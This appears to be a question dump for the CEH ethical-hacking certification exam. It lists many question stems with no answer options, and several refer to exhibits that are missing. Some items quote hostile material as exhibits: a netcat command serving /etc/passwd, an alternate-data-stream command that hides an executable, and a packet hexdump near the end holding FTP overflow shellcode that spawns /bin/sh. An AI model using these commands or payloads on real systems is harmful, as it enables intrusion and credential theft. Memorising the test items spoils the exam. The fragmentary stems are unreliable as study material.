CEH-001 Certified Ethical Hacker (CEH) Questions and Answers

If you come across a sheepdip machine at your client’s site, what should you do?

One way to defeat a multi-level security solution is to leak data via

Jack Hacker wants to break into Brown Co. ' s computers and obtain their secret double fudge cookie recipe. Jack calls Jane, an accountant at Brown Co., pretending to be an administrator from Brown Co. Jack tells Jane that there has been a problem with some accounts and asks her to verify her password with him ' ' just to double check our records. ' ' Jane does not suspect anything amiss, and parts with her password. Jack can now access Brown Co. ' s computers with a valid user name and password, to steal the cookie recipe. What kind of attack is being illustrated here?

Which Open Web Application Security Project (OWASP) implements a web application full of known vulnerabilities?

A hacker is attempting to use nslookup to query Domain Name Service (DNS). The hacker uses the nslookup interactive mode for the search. Which command should the hacker type into the command shell to request the appropriate records?

A XYZ security System Administrator is reviewing the network system log files.

He notes the following:

Network log files are at 5 MB at 12:00 noon.

At 14:00 hours, the log files at 3 MB.

What should he assume has happened and what should he do about the situation?

What are the default passwords used by SNMP? (Choose two.)

Your XYZ trainee Sandra asks you which are the four existing Regional Internet Registry (RIR ' s)?

SNMP is a protocol used to query hosts, servers, and devices about performance or health status data. This protocol has long been used by hackers to gather great amount of information about remote hosts.

Which of the following features makes this possible? (Choose two)

What does the following command in netcat do?

nc -l -u -p55555 < /etc/passwd

Study the snort rule given below:

From the options below, choose the exploit against which this rule applies.

Eric has discovered a fantastic package of tools named Dsniff on the Internet. He has learnt to use these tools in his lab and is now ready for real world exploitation. He was able to effectively intercept communications between the two entities and establish credentials with both sides of the connections. The two remote ends of the communication never notice that Eric is relaying the information between the two.

What would you call this attack?

A network administrator received an administrative alert at 3:00 a.m. from the intrusion detection system. The alert was generated because a large number of packets were coming into the network over ports 20 and 21. During analysis, there were no signs of attack on the FTP servers. How should the administrator classify this situation?

Which type of intrusion detection system can monitor and alert on attacks, but cannot stop them?

In the context of Windows Security, what is a ' null ' user?

Which of the following would be the best reason for sending a single SMTP message to an address that does not exist within the target company?

Password cracking programs reverse the hashing process to recover passwords.(True/False.

Which of the following statements about a zone transfer correct?(Choose three.

Within the context of Computer Security, which of the following statements describes Social Engineering best?

Which of the following parameters enables NMAP ' s operating system detection feature?

The fundamental difference between symmetric and asymmetric key cryptographic systems is that symmetric key cryptography uses which of the following?

How can telnet be used to fingerprint a web server?

You are manually conducting Idle Scanning using Hping2. During your scanning you notice that almost every query increments the IPID regardless of the port being queried. One or two of the queries cause the IPID to increment by more than one value. Why do you think this occurs?

Which tool/utility can help you extract the application layer data from each TCP connection from a log file into separate files?

Who is an Ethical Hacker?

Sandra is conducting a penetration test for XYZ.com. She knows that XYZ.com is using wireless networking for some of the offices in the building right down the street. Through social engineering she discovers that they are using 802.11g. Sandra knows that 802.11g uses the same 2.4GHz frequency range as 802.11b. Using NetStumbler and her 802.11b wireless NIC, Sandra drives over to the building to map the wireless networks. However, even though she repositions herself around the building several times, Sandra is not able to detect a single AP.

What do you think is the reason behind this?

You have just installed a new Linux file server at your office. This server is going to be used by several individuals in the organization, and unauthorized personnel must not be able to modify any data.

What kind of program can you use to track changes to files on the server?

Trojan horse attacks pose one of the most serious threats to computer security. The image below shows different ways a Trojan can get into a system. Which are the easiest and most convincing ways to infect a computer?

Oregon Corp is fighting a litigation suit with Scamster Inc. Oregon has assigned a private investigative agency to go through garbage, recycled paper, and other rubbish at Scamster ' s office site in order to find relevant information. What would you call this kind of activity?

Which type of antenna is used in wireless communication?

Least privilege is a security concept that requires that a user is

When analyzing the IDS logs, the system administrator noticed an alert was logged when the external router was accessed from the administrator ' s computer to update the router configuration. What type of an alert is this?

What statement is true regarding LM hashes?

Which of the following is a detective control?

Which of the following lists are valid data-gathering activities associated with a risk assessment?

One advantage of an application-level firewall is the ability to

A computer technician is using a new version of a word processing software package when it is discovered that a special sequence of characters causes the entire computer to crash. The technician researches the bug and discovers that no one else experienced the problem. What is the appropriate next step?

In keeping with the best practices of layered security, where are the best places to place intrusion detection/intrusion prevention systems? (Choose two.)

How is sniffing broadly categorized?

An engineer is learning to write exploits in C++ and is using the exploit tool Backtrack. The engineer wants to compile the newest C++ exploit and name it calc.exe. Which command would the engineer use to accomplish this?

What does an ICMP (Code 13) message normally indicates?

Peter extracts the SIDs list from Windows 2000 Server machine using the hacking tool “SIDExtractor”. Here is the output of the SIDs:

From the above list identify the user account with System Administrator privileges.

User which Federal Statutes does FBI investigate for computer crimes involving e-mail scams and mail fraud?

Which address translation scheme would allow a single public IP address to always correspond to a single machine on an internal network, allowing " server publishing " ?

A distributed port scan operates by:

Sandra has been actively scanning the client network on which she is doing a vulnerability assessment test. While conducting a port scan she notices open ports in the range of 135 to 139. What protocol is most likely to be listening on those ports?

While performing ping scans into a target network you get a frantic call from the organization’s security team. They report that they are under a denial of service attack. When you stop your scan, the smurf attack event stops showing up on the organization’s IDS monitor. How can you modify your scan to prevent triggering this event in the IDS?

A specific site received 91 ICMP_ECHO packets within 90 minutes from 47 different sites. 77 of the ICMP_ECHO packets had an ICMP ID:39612 and Seq:57072. 13 of the ICMP_ECHO packets had an ICMP ID:0 and Seq:0. What can you infer from this information?

Dan is conducting penetration testing and has found a vulnerability in a Web Application which gave him the sessionID token via a cross site scripting vulnerability. Dan wants to replay this token. However, the session ID manager (on the server) checks the originating IP address as well. Dan decides to spoof his IP address in order to replay the sessionID. Why do you think Dan might not be able to get an interactive session?

Which of the following statement correctly defines ICMP Flood Attack? (Select 2 answers)

Lori was performing an audit of her company ' s internal Sharepoint pages when she came across the following codE. What is the purpose of this code?

Jacob is looking through a traffic log that was captured using Wireshark. Jacob has come across what appears to be SYN requests to an internal computer from a spoofed IP address. What is Jacob seeing here?

Which of the following is a hashing algorithm?

What is the essential difference between an ‘Ethical Hacker’ and a ‘Cracker’?

What type of port scan is shown below?

Which of the following tools can be used to perform a zone transfer?

Which of the following command line switch would you use for OS detection in Nmap?

Which of the following ICMP message types are used for destinations unreachables?

An Nmap scan shows the following open ports, and nmap also reports that the OS guessing results to match too many signatures hence it cannot reliably be identified:

21 ftp

23 telnet

80 http

443 https

What does this suggest?

Web servers often contain directories that do not need to be indexed. You create a text file with search engine indexing restrictions and place it on the root directory of the Web Server.

User-agent: *

Disallow: /images/

Disallow: /banners/

Disallow: /Forms/

Disallow: /Dictionary/

Disallow: /_borders/

Disallow: /_fpclass/

Disallow: /_overlay/

Disallow: /_private/

Disallow: /_themes/

What is the name of this file?

In TCP communications there are 8 flags; FIN, SYN, RST, PSH, ACK, URG, ECE, CWR. These flags have decimal numbers assigned to them:

FIN = 1

SYN = 2

RST = 4

PSH = 8

ACK = 16

URG = 32

ECE = 64

CWR = 128

Jason is the security administrator of ASPEN Communications. He analyzes some traffic using Wireshark and has enabled the following filters.

What is Jason trying to accomplish here?

Which of the following statements would NOT be a proper definition for a Trojan Horse?

SNMP is a connectionless protocol that uses UDP instead of TCP packets (True or False)

What does FIN in TCP flag define?

Cyber Criminals have long employed the tactic of masking their true identity. In IP spoofing, an attacker gains unauthorized access to a computer or a network by making it appear that a malicious message has come from a trusted machine, by " spoofing " the IP address of that machine.

How would you detect IP spoofing?

Samuel is the network administrator of DataX Communications, Inc. He is trying to configure his firewall to block password brute force attempts on his network. He enables blocking the intruder ' s IP address for a period of 24 hours ' time after more than three unsuccessful attempts. He is confident that this rule will secure his network from hackers on the Internet.

But he still receives hundreds of thousands brute-force attempts generated from various IP addresses around the world. After some investigation he realizes that the intruders are using a proxy somewhere else on the Internet which has been scripted to enable the random usage of various proxies on each request so as not to get caught by the firewall rule.

Later he adds another rule to his firewall and enables small sleep on the password attempt so that if the password is incorrect, it would take 45 seconds to return to the user to begin another attempt. Since an intruder may use multiple machines to brute force the password, he also throttles the number of connections that will be prepared to accept from a particular IP address. This action will slow the intruder ' s attempts.

Samuel wants to completely block hackers brute force attempts on his network.

What are the alternatives to defending against possible brute-force password attacks on his site?

Stephanie works as a records clerk in a large office building in downtown Chicago. On Monday, she went to a mandatory security awareness class (Security5) put on by her company ' s IT department. During the class, the IT department informed all employees that everyone ' s Internet activity was thenceforth going to be monitored.

Stephanie is worried that her Internet activity might give her supervisor reason to write her up, or worse get her fired. Stephanie ' s daily work duties only consume about four hours of her time, so she usually spends the rest of the day surfing the web. Stephanie really enjoys surfing the Internet but definitely does not want to get fired for it.

What should Stephanie use so that she does not get in trouble for surfing the Internet?

Jayden is a network administrator for her company. Jayden wants to prevent MAC spoofing on all the Cisco switches in the network. How can she accomplish this?

Which method can provide a better return on IT security investment and provide a thorough and comprehensive assessment of organizational security covering policy, procedure design, and implementation?

You are conducting a port scan on a subnet that has ICMP blocked. You have discovered 23 live systems and after scanning each of them you notice that they all show port 21 in closed state.

What should be the next logical step that should be performed?

Which of the following activities will NOT be considered as passive footprinting?

__________ is found in all versions of NTFS and is described as the ability to fork file data into existing files without affecting their functionality, size, or display to traditional file browsing utilities like dir or Windows Explorer

Use the traceroute results shown above to answer the following question:

The perimeter security at targetcorp.com does not permit ICMP TTL-expired packets out.

Sandra is the security administrator of XYZ.com. One day she notices that the XYZ.com Oracle database server has been compromised and customer information along with financial data has been stolen. The financial loss will be estimated in millions of dollars if the database gets into the hands of competitors. Sandra wants to report this crime to the law enforcement agencies immediately.

Which organization coordinates computer crime investigations throughout the United States?

Why would an attacker want to perform a scan on port 137?

The Open Web Application Security Project (OWASP) testing methodology addresses the need to secure web applications by providing which one of the following services?

Which of the following is a protocol that is prone to a man-in-the-middle (MITM) attack and maps a 32-bit address to a 48-bit address?

While testing the company ' s web applications, a tester attempts to insert the following test script into the search area on the company ' s web sitE.

< script > alert( " Testing Testing Testing " ) < /script >

Afterwards, when the tester presses the search button, a pop-up box appears on the screen with the text: " Testing Testing Testing " . Which vulnerability has been detected in the web application?

What is a successful method for protecting a router from potential smurf attacks?

Which of the following tools will scan a network to perform vulnerability checks and compliance auditing?

Which NMAP feature can a tester implement or adjust while scanning for open ports to avoid detection by the network’s IDS?

The use of technologies like IPSec can help guarantee the followinG. authenticity, integrity, confidentiality and

A certified ethical hacker (CEH) completed a penetration test of the main headquarters of a company almost two months ago, but has yet to get paid. The customer is suffering from financial problems, and the CEH is worried that the company will go out of business and end up not paying. What actions should the CEH take?

Bluetooth uses which digital modulation technique to exchange information between paired devices?

Which of the following processes of PKI (Public Key Infrastructure) ensures that a trust relationship exists and that a certificate is still valid for specific operations?

You are gathering competitive intelligence on an organization. You notice that they have jobs listed on a few Internet job-hunting sites. There are two jobs for network and system administrators. How can this help you in foot printing the organization?

Attackers send an ACK probe packet with random sequence number, no response means port is filtered (Stateful firewall is present) and RST response means the port is not filtered. What type of Port Scanning is this?

Destination unreachable administratively prohibited messages can inform the hacker to what?

Bob is acknowledged as a hacker of repute and is popular among visitors of “underground” sites. Bob is willing to share his knowledge with those who are willing to learn, and many have expressed their interest in learning from him. However, this knowledge has a risk associated with it, as it can be used for malevolent attacks as well.

In this context, what would be the most affective method to bridge the knowledge gap between the “black” hats or crackers and the “white” hats or computer security professionals? (Choose the test answer)

Which Windows system tool checks integrity of critical files that has been digitally signed by Microsoft?

What flags are set in a X-MAS scan?(Choose all that apply.

Neil notices that a single address is generating traffic from its port 500 to port 500 of several other machines on the network. This scan is eating up most of the network bandwidth and Neil is concerned. As a security professional, what would you infer from this scan?

An nmap command that includes the host specification of 202.176.56-57.* will scan _______ number of hosts.

Maintaining a secure Web server requires constant effort, resources, and vigilance from an organization. Securely administering a Web server on a daily basis is an essential aspect of Web server security.

Maintaining the security of a Web server will usually involve the following steps:

1. Configuring, protecting, and analyzing log files

2. Backing up critical information frequently

3. Maintaining a protected authoritative copy of the organization ' s Web content

4. Establishing and following procedures for recovering from compromise

5. Testing and applying patches in a timely manner

6. Testing security periodically.

In which step would you engage a forensic investigator?

Jimmy, an attacker, knows that he can take advantage of poorly designed input validation routines to create or alter SQL commands to gain access to private data or execute commands in the database. What technique does Jimmy use to compromise a database?

Anonymizer sites access the Internet on your behalf, protecting your personal information from disclosure. An anonymizer protects all of your computer ' s identifying information while it surfs for you, enabling you to remain at least one step removed from the sites you visit.

You can visit Web sites without allowing anyone to gather information on sites visited by you. Services that provide anonymity disable pop-up windows and cookies, and conceal visitor ' s IP address.

These services typically use a proxy server to process each HTTP request. When the user requests a Web page by clicking a hyperlink or typing a URL into their browser, the service retrieves and displays the information using its own server. The remote server (where the requested Web page resides) receives information on the anonymous Web surfing service in place of your information.

In which situations would you want to use anonymizer? (Select 3 answers)

Attacking well-known system defaults is one of the most common hacker attacks. Most software is shipped with a default configuration that makes it easy to install and setup the application. You should change the default settings to secure the system.

Which of the following is NOT an example of default installation?

A company has made the decision to host their own email and basic web services. The administrator needs to set up the external firewall to limit what protocols should be allowed to get to the public part of the company ' s network. Which ports should the administrator open? (Choose three.)

Which of the following techniques can be used to mitigate the risk of an on-site attacker from connecting to an unused network port and gaining full access to the network? (Choose three.)

Frederickson Security Consultants is currently conducting a security audit on the networks of Hawthorn Enterprises, a contractor for the Department of Defense. Since Hawthorn Enterprises conducts business daily with the federal government, they must abide by very stringent security policies. Frederickson is testing all of Hawthorn ' s physical and logical security measures including biometrics, passwords, and permissions. The federal government requires that all users must utilize random, non-dictionary passwords that must take at least 30 days to crack. Frederickson has confirmed that all Hawthorn employees use a random password generator for their network passwords. The Frederickson consultants have saved off numerous SAM files from Hawthorn ' s servers using Pwdump6 and are going to try and crack the network passwords. What method of attack is best suited to crack these passwords in the shortest amount of time?

What is the default Password Hash Algorithm used by NTLMv2?

Michael is a junior security analyst working for the National Security Agency (NSA) working primarily on breaking terrorist encrypted messages. The NSA has a number of methods they use to decipher encrypted messages including Government Access to Keys (GAK) and inside informants. The NSA holds secret backdoor keys to many of the encryption algorithms used on the Internet. The problem for the NSA, and Michael, is that terrorist organizations are starting to use custom-built algorithms or obscure algorithms purchased from corrupt governments. For this reason, Michael and other security analysts like him have been forced to find different methods of deciphering terrorist messages. One method that Michael thought of using was to hide malicious code inside seemingly harmless programs. Michael first monitors sites and bulletin boards used by known terrorists, and then he is able to glean email addresses to some of these suspected terrorists. Michael then inserts a stealth keylogger into a mapping program file readme.txt and then sends that as an attachment to the terrorist. This keylogger takes screenshots every 2 minutes and also logs all keyboard activity into a hidden file on the terrorist ' s computer. Then, the keylogger emails those files to Michael twice a day with a built in SMTP server. What technique has Michael used to disguise this keylogging software?

You want to know whether a packet filter is in front of 192.168.1.10. Pings to 192.168.1.10 don ' t get answered. A basic nmap scan of 192.168.1.10 seems to hang without returning any information. What should you do next?

Which definition below best describes a covert channel?

You establish a new Web browser connection to Google. Since a 3-way handshake is required for any TCP connection, the following actions will take place.

DNS query is sent to the DNS server to resolve www.google.com

DNS server replies with the IP address for Google?

SYN packet is sent to Google.

Google sends back a SYN/ACK packet

Your computer completes the handshake by sending an ACK

The connection is established and the transfer of data commences

Which of the following packets represent completion of the 3-way handshake?

Which security strategy requires using several, varying methods to protect IT systems against attacks?

Which of the following is a primary service of the U.S. Computer Security Incident Response Team (CSIRT)?

Which of the following descriptions is true about a static NAT?

How would you describe an attack where an attacker attempts to deliver the payload over multiple packets over long periods of time with the purpose of defeating simple pattern matching in IDS systems without session reconstruction? A characteristic of this attack would be a continuous stream of small packets.

While performing a ping sweep of a local subnet you receive an ICMP reply of Code 3/Type 13 for all the pings you have sent out. What is the most likely cause of this?

You want to capture Facebook website traffic in Wireshark. What display filter should you use that shows all TCP packets that contain the word ' facebook ' ?

A rootkit is a collection of tools (programs) that enable administrator-level access to a computer. This program hides itself deep into an operating system for malicious activity and is extremely difficult to detect. The malicious software operates in a stealth fashion by hiding its files, processes and registry keys and may be used to create a hidden directory or folder designed to keep out of view from a user ' s operating system and security software.

What privilege level does a rootkit require to infect successfully on a Victim ' s machine?

An attacker finds a web page for a target organization that supplies contact information for the company. Using available details to make the message seem authentic, the attacker drafts e-mail to an employee on the contact page that appears to come from an individual who might reasonably request confidential information, such as a network administrator.

The email asks the employee to log into a bogus page that requests the employee ' s user name and password or click on a link that will download spyware or other malicious programming.

Google ' s Gmail was hacked using this technique and attackers stole source code and sensitive data from Google servers. This is highly sophisticated attack using zero-day exploit vectors, social engineering and malware websites that focused on targeted individuals working for the company.

What is this deadly attack called?

What file system vulnerability does the following command take advantage of?

type c:\anyfile.exe > c:\winnt\system32\calc.exe:anyfile.exe

What is a sniffing performed on a switched network called?

In the context of password security: a simple dictionary attack involves loading a dictionary file (a text file full of dictionary words) into a cracking application such as L0phtCrack or John the Ripper, and running it against user accounts located by the application. The larger the word and word fragment selection, the more effective the dictionary attack is. The brute force method is the most inclusive - though slow. Usually, it tries every possible letter and number combination in its automated exploration. If you would use both brute force and dictionary combined together to have variations of words, what would you call such an attack?

You just purchased the latest DELL computer, which comes pre-installed with Windows 7, McAfee antivirus software and a host of other applications. You want to connect Ethernet wire to your cable modem and start using the computer immediately. Windows is dangerously insecure when unpacked from the box, and there are a few things that you must do before you use it.

You receive an e-mail with the following text message.

" Microsoft and HP today warned all customers that a new, highly dangerous virus has been discovered which will erase all your files at midnight. If there ' s a file called hidserv.exe on your computer, you have been infected and your computer is now running a hidden server that allows hackers to access your computer. Delete the file immediately. Please also pass this message to all your friends and colleagues as soon as possible. "

You launch your antivirus software and scan the suspicious looking file hidserv.exe located in c:\windows directory and the AV comes out clean meaning the file is not infected. You view the file signature and confirm that it is a legitimate Windows system file " Human Interface Device Service " .

What category of virus is this?

The SYN flood attack sends TCP connections requests faster than a machine can process them.

Attacker creates a random source address for each packet

SYN flag set in each packet is a request to open a new connection to the server from the spoofed IP address

Victim responds to spoofed IP address, then waits for confirmation that never arrives (timeout wait is about 3 minutes)

Victim ' s connection table fills up waiting for replies and ignores new connections

Legitimate users are ignored and will not be able to access the server

How do you protect your network against SYN Flood attacks?

Jason works in the sales and marketing department for a very large advertising agency located in Atlanta. Jason is working on a very important marketing campaign for his company ' s largest client. Before the project could be completed and implemented, a competing advertising company comes out with the exact same marketing materials and advertising, thus rendering all the work done for Jason ' s client unusable. Jason is questioned about this and says he has no idea how all the material ended up in the hands of a competitor.

Without any proof, Jason ' s company cannot do anything except move on. After working on another high profile client for about a month, all the marketing and sales material again ends up in the hands of another competitor and is released to the public before Jason ' s company can finish the project. Once again, Jason says that he had nothing to do with it and does not know how this could have happened. Jason is given leave with pay until they can figure out what is going on.

Jason ' s supervisor decides to go through his email and finds a number of emails that were sent to the competitors that ended up with the marketing material. The only items in the emails were attached jpg files, but nothing else. Jason ' s supervisor opens the picture files, but cannot find anything out of the ordinary with them.

What technique has Jason most likely used?

Which Steganography technique uses Whitespace to hide secret messages?

Which of the following Registry location does a Trojan add entries to make it persistent on Windows 7? (Select 2 answers)

Firewalk has just completed the second phase (the scanning phase) and a technician receives the output shown below. What conclusions can be drawn based on these scan results? TCP port 21 – no response TCP port 22 – no response TCP port 23 – Time-to-live exceeded

Which of the following is a hardware requirement that either an IDS/IPS system or a proxy server must have in order to properly function?

Which of the following is used to indicate a single-line comment in structured query language (SQL)?

In the following example, which of these is the " exploit " ?

Today, Microsoft Corporation released a security notice. It detailed how a person could bring down the Windows 2003 Server operating system, by sending malformed packets to it. They detailed how this malicious process had been automated using basic scripting. Even worse, the new automated method for bringing down the server has already been used to perform denial of service attacks on many large commercial websites.

Select the best answer.

What tool can crack Windows SMB passwords simply by listening to network traffic?

Select the best answer.

Fingerprinting an Operating System helps a cracker because:

This kind of password cracking method uses word lists in combination with numbers and special characters:

Tess King, the evil hacker, is purposely sending fragmented ICMP packets to a remote target. The total size of this ICMP packet once reconstructed is over 65, 536 bytes. From the information given, what type of attack is Tess King attempting to perform?

Exhibit:

ettercap –NCLzs --quiet

What does the command in the exhibit do in “Ettercap”?

What is a NULL scan?

Under what conditions does a secondary name server request a zone transfer from a primary name server?

Which one of the following instigates a SYN flood attack?

While examining audit logs, you discover that people are able to telnet into the SMTP server on port 25. You would like to block this, though you do not see any evidence of an attack or other wrong doing. However, you are concerned about affecting the normal functionality of the email server. From the following options choose how best you can achieve this objective?

Which of the following are potential attacks on cryptography? (Select 3)

Jane has just accessed her preferred e-commerce web site and she has seen an item she would like to buy. Jane considers the price a bit too steep; she looks at the page source code and decides to save the page locally to modify some of the page variables. In the context of web application security, what do you think Jane has changed?

In the context of using PKI, when Sven wishes to send a secret message to Bob, he looks up Bob’s public key in a directory, uses it to encrypt the message before sending it off. Bob then uses his private key to decrypt the message and reads it. No one listening on can decrypt the message.

Anyone can send an encrypted message to Bob but only Bob can read it. Thus, although many people may know Bob’s public key and use it to verify Bob’s signature, they cannot discover Bob’s private key and use it to forge digital signatures.

What does this principle refer to?

What are the main drawbacks for anti-virus software?

You are doing IP spoofing while you scan your target. You find that the target has port 23 open. Anyway you are unable to connect. Why?

An NMAP scan of a server shows port 25 is open. What risk could this pose?

From the two screenshots below, which of the following is occurring?

A company has hired a security administrator to maintain and administer Linux and Windows-based systems. Written in the nightly report file is the followinG.

Firewall log files are at the expected value of 4 MB. The current time is 12am. Exactly two hours later the size has decreased considerably. Another hour goes by and the log files have shrunk in size again.

Which of the following actions should the security administrator take?

ICMP ping and ping sweeps are used to check for active systems and to check

In the OSI model, where does PPTP encryption take place?

A file integrity program such as Tripwire protects against Trojan horse attacks by:

Which of the following display filters will you enable in Ethereal to view the three-way handshake for a connection from host 192.168.0.1?

Ethereal works best on ____________.

Jason ' s Web server was attacked by a trojan virus. He runs protocol analyzer and notices that the trojan communicates to a remote server on the Internet. Shown below is the standard " hexdump " representation of the network packet, before being decoded. Jason wants to identify the trojan by looking at the destination port number and mapping to a trojan-port number database on the Internet. Identify the remote server ' s port number by decoding the packet?

How would you describe a simple yet very effective mechanism for sending and receiving unauthorized information or data between machines without alerting any firewalls and IDS ' s on a network?

What happens when one experiences a ping of death?

Which DNS resource record can indicate how long any " DNS poisoning " could last?

A penetration tester is hired to do a risk assessment of a company ' s DMZ. The rules of engagement states that the penetration test be done from an external IP address with no prior knowledge of the internal IT systems. What kind of test is being performed?

Which statement is TRUE regarding network firewalls preventing Web Application attacks?

A certified ethical hacker (CEH) is approached by a friend who believes her husband is cheating. She offers to pay to break into her husband ' s email account in order to find proof so she can take him to court. What is the ethical response?

A hacker is attempting to see which ports have been left open on a network. Which NMAP switch would the hacker use?

Which technical characteristic do Ethereal/Wireshark, TCPDump, and Snort have in common?

Company A and Company B have just merged and each has its own Public Key Infrastructure (PKI). What must the Certificate Authorities (CAs) establish so that the private PKIs for Company A and Company B trust one another and each private PKI can validate digital certificates from the other company?

You are the security administrator of Jaco Banking Systems located in Boston. You are setting up e-banking website (http://www.ejacobank.com) authentication system. Instead of issuing banking customer with a single password, you give them a printed list of 100 unique passwords. Each time the customer needs to log into the e-banking system website, the customer enters the next password on the list. If someone sees them type the password using shoulder surfing, MiTM or keyloggers, then no damage is done because the password will not be accepted a second time. Once the list of 100 passwords is almost finished, the system automatically sends out a new password list by encrypted e-mail to the customer.

You are confident that this security implementation will protect the customer from password abuse.

Two months later, a group of hackers called " HackJihad " found a way to access the one-time password list issued to customers of Jaco Banking Systems. The hackers set up a fake website (http://www.e-jacobank.com) and used phishing attacks to direct ignorant customers to it. The fake website asked users for their e-banking username and password, and the next unused entry from their one-time password sheet. The hackers collected 200 customer ' s username/passwords this way. They transferred money from the customer ' s bank account to various offshore accounts.

Your decision of password policy implementation has cost the bank with USD 925, 000 to hackers. You immediately shut down the e-banking website while figuring out the next best security solution

What effective security solution will you recommend in this case?

Which of the following identifies the three modes in which Snort can be configured to run?

Global deployment of RFC 2827 would help mitigate what classification of attack?

What hacking attack is challenge/response authentication used to prevent?

When Jason moves a file via NFS over the company ' s network, you want to grab a copy of it by sniffing. Which of the following tool accomplishes this?

In the context of password security, a simple dictionary attack involves loading a dictionary file (a text file full of dictionary words) into a cracking application such as L0phtCrack or John the Ripper, and running it against user accounts located by the application. The larger the word and word fragment selection, the more effective the dictionary attack is. The brute force method is the most inclusive, although slow. It usually tries every possible letter and number combination in its automated exploration.

If you would use both brute force and dictionary methods combined together to have variation of words, what would you call such an attack?

What results will the following command yielD. ' NMAP -sS -O -p 123-153 192.168.100.3 ' ?

Which of the following resources does NMAP need to be used as a basic vulnerability scanner covering several vectors like SMB, HTTP and FTP?

During a penetration test, a tester finds a target that is running MS SQL 2000 with default credentials. The tester assumes that the service is running with Local System account. How can this weakness be exploited to access the system?

When setting up a wireless network, an administrator enters a pre-shared key for security. Which of the following is true?

Which of the following network attacks relies on sending an abnormally large packet size that exceeds TCP/IP specifications?

Which of the following open source tools would be the best choice to scan a network for potential targets?

Which United States legislation mandates that the Chief Executive Officer (CEO) and the Chief Financial Officer (CFO) must sign statements verifying the completeness and accuracy of financial reports?

Which of the following network attacks takes advantage of weaknesses in the fragment reassembly functionality of the TCP/IP protocol stack?

A tester is attempting to capture and analyze the traffic on a given network and realizes that the network has several switches. What could be used to successfully sniff the traffic on this switched network? (Choose three.)

A security engineer has been asked to deploy a secure remote access solution that will allow employees to connect to the company’s internal network. Which of the following can be implemented to minimize the opportunity for the man-in-the-middle attack to occur?

What is the name of the international standard that establishes a baseline level of confidence in the security functionality of IT products by providing a set of requirements for evaluation?

What information should an IT system analysis provide to the risk assessor?

A newly discovered flaw in a software application would be considered which kind of security vulnerability?

An ethical hacker for a large security research firm performs penetration tests, vulnerability tests, and risk assessments. A friend recently started a company and asks the hacker to perform a penetration test and vulnerability assessment of the new company as a favor. What should the hacker ' s next step be before starting work on this job?

Which of the following is a common Service Oriented Architecture (SOA) vulnerability?

You suspect that your Windows machine has been compromised with a Trojan virus. When you run anti-virus software it does not pick of the Trojan. Next you run netstat command to look for open ports and you notice a strange port 6666 open.

What is the next step you would do?

LM authentication is not as strong as Windows NT authentication so you may want to disable its use, because an attacker eavesdropping on network traffic will attack the weaker protocol. A successful attack can compromise the user ' s password. How do you disable LM authentication in Windows XP?

What is the term 8 to describe an attack that falsifies a broadcast ICMP echo request and includes a primary and secondary victim?

Which type of scan measures a person ' s external features through a digital video camera?

Some passwords are stored using specialized encryption algorithms known as hashes. Why is this an appropriate method?

Exhibit:

TCP TTL:50 TOS:0×0 ID:53476 DF

*****PA* Seq: 0x33BC72AD Ack: 0x110CE81E Win: 0x7D78

TCP Options = > NOP NOP TS: 126045057 105803098

50 41 53 53 20 90 90 90 90 90 90 90 90 90 90 90 PASS ………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 31 C0 31 DB 31 C9 B0 46 CD …….1.1.1..F.

80 31 C0 31 DB 43 89 D9 41 B0 3F CD 80 EB 6B 5E .1.1.C..A.?…k^

31 C0 31 C9 8D 5E 01 88 46 04 66 B9 FF FF 01 B0 1.1..^..F.f…..

27 CD 80 31 C0 8D 5E 01 B0 3D CD 80 31 C0 31 DB ‘..1..^..=..1.1.

8D 5E 08 89 43 02 31 C9 FE C9 31 C0 8D 5E 08 B0 .^..C.1…1..^..

0C CD 80 FE C9 75 F3 31 C0 88 46 09 8D 5E 08 B0 …..u.1..F..^..

3D CD 80 FE 0E B0 30 FE C8 88 46 04 31 C0 88 46 =…..0…F.1..F

07 89 76 08 89 46 0C 89 F3 8D 4E 08 8D 56 0C B0 ..v..F….N..V..

0B CD 80 31 C0 31 DB B0 01 CD 80 E8 90 FF FF FF …1.1……….

FF FF FF 30 62 69 6E 30 73 68 31 2E 2E 31 31 76 …0bin0sh1..11v

65 6E 67 6C 69 6E 40 6B 6F 63 68 61 6D 2E 6B 61 englin@kocham.ka

73 69 65 2E 63 6F 6D 0D 0A sie.com..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

12/09-01:22:31.169534 172.16.1.104:21 - > 207.219.207.240:1882

TCP TTL:63 TOS:0×10 ID:48231 DF

*****PA* Seq: 0x110CE81E Ack: 0x33BC7446 Win: 0x7D78

TCP Options = > NOP NOP TS: 105803113 126045057

35 33 30 20 4C 6F 67 69 6E 20 69 6E 63 6F 72 72 530 Login incorr

65 63 74 2E 0D 0A ect…

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

12/09-01:22:39.878150 172.16.1.104:21 - > 207.219.207.240:1882 TCP TTL:63 TOS:0×10 ID:48233 DF

*****PA* Seq: 0x110CE834 Ack: 0x33BC7447 Win: 0x7D78

TCP Options = > NOP NOP TS: 105803984 126045931

32 32 31 20 59 6F 75 20 63 6F 75 6C 64 20 61 74 221 You could at

20 6C 65 61 73 74 20 73 61 79 20 67 6F 6F 64 62 least say goodb

79 65 2E 0D 0A ye…

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

12/09-01:22:39.880154 172.16.1.104:21 - > 207.219.207.240:1882

TCP TTL:63 TOS:0×10 ID:48234 DF

***F**A* Seq: 0x110CE859 Ack: 0x33BC7447 Win: 0x7D78

TCP Options = > NOP NOP TS: 105803984 126045931

